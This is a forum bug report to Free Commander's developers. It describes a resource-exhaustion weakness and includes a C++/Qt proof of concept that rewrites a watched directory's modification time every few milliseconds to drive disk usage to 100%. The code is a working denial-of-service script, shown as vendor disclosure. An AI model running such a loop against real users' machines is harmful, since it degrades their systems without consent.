Vurneability from malicious programs in Windows

Bugs and issues.
Post Reply
Message
Author
Szyk Cech
Posts: 1
Joined: 22.11.2016, 18:22

Vurneability from malicious programs in Windows

#1 Post by Szyk Cech » 22.11.2016, 18:32

Free Commander is sensitive with malicious programs. This is not happen in Total Commander nor M$ Explorer. Attack is simple:
1) find out what directory user browse in FC
2) change fast modify date periodically for some file or directory in directory found in 1)
Then disk usage grow to 100% and whole system slow down noticeably.

Sample code is as follow (it is Qt5.6.1 and VC++14 program, 64bit):

Code: Select all

#include <QFileInfo>
#include <QtCore/qt_windows.h>
#include <exception>
#include <QTextStream>
#include <QDateTime>
#include <QThread>

void gSetFileTime(QString aPathToFile, QDateTime aCreateTime, QDateTime aModifyTime, QDateTime aAccessTime)
{
    FILETIME pmodifiedtime, pcreationtime, paccesstime;
    HANDLE hfile;
    LPCWSTR filename = aPathToFile.toStdWString().c_str();
    QFileInfo lFileInfo(aPathToFile);
    if(lFileInfo.isDir())
        hfile=CreateFile(L"c:\\!-sciagniete",GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS,NULL);
    else
        hfile=CreateFile(filename,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);

    if(hfile==INVALID_HANDLE_VALUE) throw std::exception("File open failed!");
    else
    {
        if(!aCreateTime.isNull())
        {
            LONGLONG ll = Int32x32To64(aCreateTime.toTime_t(), 10000000) + 116444736000000000;
            pcreationtime.dwLowDateTime = (DWORD) ll;
            pcreationtime.dwHighDateTime = ll >> 32;
        }
        if(!aModifyTime.isNull())
        {
            LONGLONG ll2 = Int32x32To64(aModifyTime.toTime_t(), 10000000) + 116444736000000000;
            pmodifiedtime.dwLowDateTime = (DWORD) ll2;
            pmodifiedtime.dwHighDateTime = ll2 >> 32;
        }
        if(!aAccessTime.isNull())
        {
            LONGLONG ll3 = Int32x32To64(aAccessTime.toTime_t(), 10000000) + 116444736000000000;
            paccesstime.dwLowDateTime = (DWORD) ll3;
            paccesstime.dwHighDateTime = ll3 >> 32;
        }

        if(!SetFileTime(hfile, &pcreationtime, &paccesstime, &pmodifiedtime))
            std::exception("Unable to set Date And Time!!!");
    }
    CloseHandle(hfile);
}

int main(int argc, char *argv[])
{
    QString lDirName("c:\\!-sciagniete");
    QTextStream lOut(stdout);
    QDateTime lDate(QFileInfo(lDirName).lastModified());
    qint64 lCounter(0);

    try
    {
        lOut << "Start annoying commander." << endl;
        while(true)
        {
            ++lCounter;
            gSetFileTime(lDirName, lDate.addSecs(lCounter), QDateTime(), QDateTime());
            QThread::msleep(5);
            //lOut << "\r" << lCounter;
        }
    }
    catch(std::exception& aEx)
    {
        QTextStream lErr(stderr);
        lErr << "Exception occurss!!! Exception message: " << aEx.what() << endl;
        return EXIT_FAILURE;
    }


    return EXIT_SUCCESS;
}
Note: Directory name in gSetFileTime is hadrwirtten due to some strange problems with conversion between QString and LPCWSTR.

Post Reply

Who is online

Users browsing this forum: No registered users and 31 guests